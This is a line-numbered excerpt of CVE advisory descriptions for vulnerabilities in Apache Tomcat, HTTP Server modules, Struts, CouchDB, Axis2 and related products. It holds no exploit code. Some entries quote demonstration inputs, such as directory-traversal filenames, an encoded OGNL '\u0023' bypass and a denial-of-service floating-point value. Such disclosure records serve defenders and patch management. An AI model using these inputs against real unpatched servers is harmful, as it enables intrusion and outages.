12579| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
12580| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
12581| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
12582| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
12583| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
12584| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
12585| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
12586| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
12587| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
12588| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
12589| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
12590| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
12591| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
12592| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
12593| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
12594| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
12595| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
12596| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
12597| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
12598| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
12599| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
12600| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
12601| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
12602| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
12603| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
12604| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
12605| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
12606| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
12607| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
12608| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
12609| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
12610| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
12611| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
12612| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
12613| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
12614| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
12615| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
12616| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
12617| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
12618| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
12619| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
12620| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
12621| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
12622| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
12623| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
12624| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
12625| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
12626| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
12627| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
12628| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
12629| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
12630| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
12631| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
12632| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
12633| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
12634| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
12635| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
12636| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
12637| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
12638| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
12639| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
12640| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
12641| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
12642| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
12643| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
12644| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
12645| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
12646| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
12647| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
12648| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
12649| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
12650| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
12651| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
12652| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
12653| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
12654| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
12655| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
12656| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
12657| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
12658| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
12659| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
12660| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
12661| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
12662| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
12663| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
12664| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
12665| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
12666| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
12667| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
12668| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
12669| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
12670| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
12671| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
12672| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
12673| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
12674| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
12675| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
12676| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
12677| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
12678| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
12679| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
12680| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
12681| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
12682| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
